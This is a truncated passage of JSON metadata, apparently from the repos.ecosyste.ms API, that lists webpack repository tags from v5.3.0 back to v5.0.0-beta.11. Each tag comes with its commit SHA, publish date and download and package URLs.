1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https:/